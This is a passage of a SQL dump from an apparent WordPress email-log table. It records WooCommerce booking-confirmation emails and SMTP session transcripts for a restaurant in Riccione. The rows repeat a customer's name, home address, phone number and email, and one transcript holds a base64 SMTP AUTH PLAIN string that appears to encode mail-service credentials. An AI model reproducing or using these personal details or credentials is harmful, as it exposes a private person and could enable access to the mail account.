class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n									<tr>\n					<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Note:</th>\n					<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prenotazione per 6/11 pranzo ore 13 circa</td>\n				</tr>\n						</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Raffaele Biondi<br>Via cecati 13<br>42122<br>Reggio emilia<br>REGGIO EMILIA									<br><a href=\"tel:3479247631\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3479247631</a>													<br>raf.biondi@libero.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Congratulations on the sale.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(22459,1223,'original_headers','Content-Type: text/html\r\nReply-to: Raffaele Biondi <raf.biondi@libero.it>\r\n'),(22460,1223,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 05 Nov 2020 14:04:17 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(22461,1224,'solution','Not found, check status column for more info.'),(22462,1224,'success','1'),(22463,1224,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(22464,1224,'to_header','notifiche@ristorantesolymar.it'),(22465,1224,'reply_to_header','Raffaele Biondi <raf.biondi@libero.it>'),(22466,1224,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(22467,1224,'original_to','notifiche@ristorantesolymar.it'),(22468,1224,'original_subject','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1222) - 5 November 2020'),(22469,1224,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">You’ve received the following order from Raffaele Biondi:</p>\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1222&amp;action=edit\" style=\"font-weight: normal; text-decoration: underline; color: #557da1;\">[Order #1222]</a> (5 November 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Caparra - 2 (#caparrax2)		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Total:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n									<tr>\n					<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Note:</th>\n					<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prenotazione per 6/11 pranzo ore 13 circa</td>\n				</tr>\n						</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Raffaele Biondi<br>Via cecati 13<br>42122<br>Reggio emilia<br>REGGIO EMILIA									<br><a href=\"tel:3479247631\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3479247631</a>													<br>raf.biondi@libero.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Congratulations on the sale.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(22470,1224,'original_headers','Content-Type: text/html\r\nReply-to: Raffaele Biondi <raf.biondi@libero.it>\r\n'),(22471,1224,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\nrtical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto,=\r\n Arial, sans-serif; border-radius: 3px 3px 0 0;\'>=0A=09=09=09=09=09=09=\r\n=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09<td id=3D\"header_wra=\r\npper\" style=3D\"padding: 36px 48px; display: block;\">=0A=09=09=09=09=09=\r\n=09=09=09=09=09=09=09<h1 style=3D\'font-family: \"Helvetica Neue\", Helveti=\r\nca, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-h=\r\neight: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4;=\r\n color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente<=\r\n/h1>=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=\r\n=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=\r\n=09=09=09<!-- End Header -->=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=\r\n=09=09=09=09</tr>=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=\r\n<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09=09=09=09<!-- B=\r\nody -->=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"=\r\n0\" cellspacing=3D\"0\" width=3D\"600\" id=3D\"template_body\">=0A=09=09=09=09=\r\n=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09<td valign=3D\"=\r\ntop\" id=3D\"body_content\" style=3D\"background-color: #fdfdfd;\">=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<!-- Content -->=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"20\" cellspacing=3D\"0\"=\r\n width=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09=09=09=09=09=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding:=\r\n 48px 48px 32px;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09=09<div i=\r\nd=3D\"body_content_inner\" style=3D\'color: #737373; font-family: \"Helvetic=\r\na Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-hei=\r\nght: 150%; text-align: left;\'>=0A=0A<p style=3D\"margin: 0 0 16px;\">You=\r\n=E2=80=99ve received the following order from Raffaele Biondi:</p>=0A=0A=\r\n<h2 style=3D\'color: #557da1; display: block; font-family: \"Helvetica Neu=\r\ne\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight:=\r\n bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>=0A=09<a=\r\n class=3D\"link\" href=3D\"https://www.ristorantesolymar.it/wp-admin/post.p=\r\nhp?post=3D1222&amp;action=3Dedit\" style=3D\"font-weight: normal; text-dec=\r\noration: underline; color: #557da1;\">[Order #1222]</a> (5 November 2020)=\r\n</h2>=0A=0A<div style=3D\"margin-bottom: 40px;\">=0A=09<table class=3D\"td\"=\r\n cellspacing=3D\"0\" cellpadding=3D\"6\" border=3D\"1\" style=3D\"color: #73737=\r\n3; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-=\r\nfamily: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=09=\r\n=09<thead>=0A=09=09=09<tr>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\"=\r\n style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: mid=\r\ndle; padding: 12px; text-align: left;\">Product</th>=0A=09=09=09=09<th cl=\r\nass=3D\"td\" scope=3D\"col\" style=3D\"color: #737373; border: 1px solid #e4e=\r\n4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantity<=\r\n/th>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"color: #73737=\r\n3; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; tex=\r\nt-align: left;\">Price</th>=0A=09=09=09</tr>=0A=09=09</thead>=0A=09=09<tb=\r\nody>=0A=09=09=09=09<tr class=3D\"order_item\">=0A=09=09<td class=3D\"td\" st=\r\nyle=3D\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-al=\r\nign: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvet=\r\nica, Roboto, Arial, sans-serif; word-wrap: break-word;\">=0A=09=09Caparra=\r\n - 2 (#caparrax2)=09=09</td>=0A=09=09<td class=3D\"td\" style=3D\"color: #7=\r\n37373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; verti=\r\ncal-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Ari=\r\nal, sans-serif;\">=0A=09=09=091=09=09</td>=0A=09=09<td class=3D\"td\" style=\r\n=3D\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align=\r\n: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica=\r\n, Roboto, Arial, sans-serif;\">=0A=09=09=09<span class=3D\"woocommerce-Pri=\r\nce-amount amount\">30,00<span class=3D\"woocommerce-Price-currencySymbol\">=\r\n=E2=82=AC</span></span>=09=09</td>=0A=09</tr>=0A=09=0A=09=09</tbody>=0A=\r\n=09=09<tfoot>=0A=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th cla=\r\nss=3D\"td\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; border: 1=\r\npx solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: lef=\r\nt; border-top-width: 4px;\">Subtotal:</th>=0A=09=09=09=09=09=09<td class=\r\n=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-ali=\r\ngn: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><sp=\r\nan class=3D\"woocommerce-Price-amount amount\">30,00<span class=3D\"woocomm=\r\nerce-Price-currencySymbol\">=E2=82=AC</span></span></td>=0A=09=09=09=09=\r\n=09</tr>=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th cl=\r\nass=3D\"td\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; border:=\r\n 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: l=\r\neft;\">Payment method:</th>=0A=09=09=09=09=09=09<td class=3D\"td\" style=3D=\r\n\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padd=\r\ning: 12px; text-align: left;\">PayPal</td>=0A=09=09=09=09=09</tr>=0A=09=\r\n=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" sco=\r\npe=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; border: 1px solid #e4e=\r\n4e4; vertical-align: middle; padding: 12px; text-align: left;\">Total:</t=\r\nh>=0A=09=09=09=09=09=09<td class=3D\"td\" style=3D\"color: #737373; border:=\r\n 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: l=\r\neft;\"><span class=3D\"woocommerce-Price-amount amount\">30,00<span class=\r\n=3D\"woocommerce-Price-currencySymbol\">=E2=82=AC</span></span></td>=0A=09=\r\n=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09<th=\r\n class=3D\"td\" scope=3D\"row\" colspan=3D\"2\" style=3D\"color: #737373; borde=\r\nr: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align:=\r\n left;\">Note:</th>=0A=09=09=09=09=09<td class=3D\"td\" style=3D\"color: #73=\r\n7373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px;=\r\n text-align: left;\">Prenotazione per 6/11 pranzo ore 13 circa</td>=0A=09=\r\n=09=09=09</tr>=0A=09=09=09=09=09=09</tfoot>=0A=09</table>=0A</div>=0A=0A=\r\n=0A<table id=3D\"addresses\" cellspacing=3D\"0\" cellpadding=3D\"0\" border=3D=\r\n\"0\" style=3D\"width: 100%; vertical-align: top; margin-bottom: 40px; padd=\r\ning: 0;\">=0A=09<tr>=0A=09=09<td valign=3D\"top\" width=3D\"50%\" style=3D\"te=\r\nxt-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial,=\r\n sans-serif; border: 0; padding: 0;\">=0A=09=09=09<h2 style=3D\'color: #55=\r\n7da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto,=\r\n Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130=\r\n%; margin: 0 0 18px; text-align: left;\'>Billing address</h2>=0A=0A=09=09=\r\n=09<address class=3D\"address\" style=3D\"padding: 12px; color: #737373; bo=\r\nrder: 1px solid #e4e4e4;\">=0A=09=09=09=09Raffaele Biondi<br>Via cecati 1=\r\n3<br>42122<br>Reggio emilia<br>REGGIO EMILIA=09=09=09=09=09=09=09=09=09<=\r\nbr><a href=3D\"tel:3479247631\" style=3D\"color: #557da1; font-weight: norm=\r\nal; text-decoration: underline;\">3479247631</a>=09=09=09=09=09=09=09=09=\r\n=09=09=09=09=09<br>raf.biondi@libero.it=09=09=09=09=09=09=09</address>=\r\n=0A=09=09</td>=0A=09=09=09</tr>=0A</table>=0A<p style=3D\"margin: 0 0 16p=\r\nx;\">Congratulations on the sale.</p>=0A=09=09=09=09=09=09=09=09=09=09=09=\r\n=09=09=09=09</div>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09</td>=0A=\r\n=09=09=09=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=\r\n=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09=09=09=09<!-- End Cont=\r\nent -->=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=\r\n=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=\r\n=09=09=09=09<!-- End Body -->=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=\r\n=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=09=09=09=09</td>=\r\n=0A=09=09=09=09</tr>=0A=09=09=09=09<tr>=0A=09=09=09=09=09<td align=3D\"ce=\r\nnter\" valign=3D\"top\">=0A=09=09=09=09=09=09<!-- Footer -->=0A=09=09=09=09=\r\n=09=09<table border=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"=\r\n600\" id=3D\"template_footer\">=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=\r\n=09=09=09=09<td valign=3D\"top\" style=3D\"padding: 0; border-radius: 6px;\"=\r\n>=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"10\" ce=\r\nllspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=\r\n=09=09=09=09=09=09=09=09=09=09=09<td colspan=3D\"2\" valign=3D\"middle\" id=\r\n=3D\"credit\" style=3D\'border-radius: 6px; border: 0; color: #969696; font=\r\n-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-si=\r\nze: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>=0A=\r\n=09=09=09=09=09=09=09=09=09=09=09=09<p style=3D\"margin: 0 0 16px;\">Sol Y=\r\n Mar, ristorante a Riccione</p>=0A=09=09=09=09=09=09=09=09=09=09=09</td>=\r\n=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</ta=\r\nble>=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=\r\n=09=09=09=09=09</table>=0A=09=09=09=09=09=09<!-- End Footer -->=0A=09=09=\r\n=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=09</table>=0A=09=09</div>=0A=\r\n=09</body>=0A</html>=0A\r\n.\r\n250 OK id=1kakYV-0003aQ-JG\r\n'),(22472,1225,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(22473,1225,'success',''),(22474,1225,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(22475,1225,'to_header','raf.biondi@libero.it'),(22476,1225,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(22477,1225,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(22478,1225,'original_to','raf.biondi@libero.it'),(22479,1225,'original_subject','Your Sol Y Mar, ristorante a Riccione order has been received!'),(22480,1225,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Thank you for your order</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hi Raffaele,</p>\n<p style=\"margin: 0 0 16px;\">Just to let you know — we\'ve received your order #1222, and it is now being processed:</p>\n\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	[Order #1222] (5 November 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Caparra - 2		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" 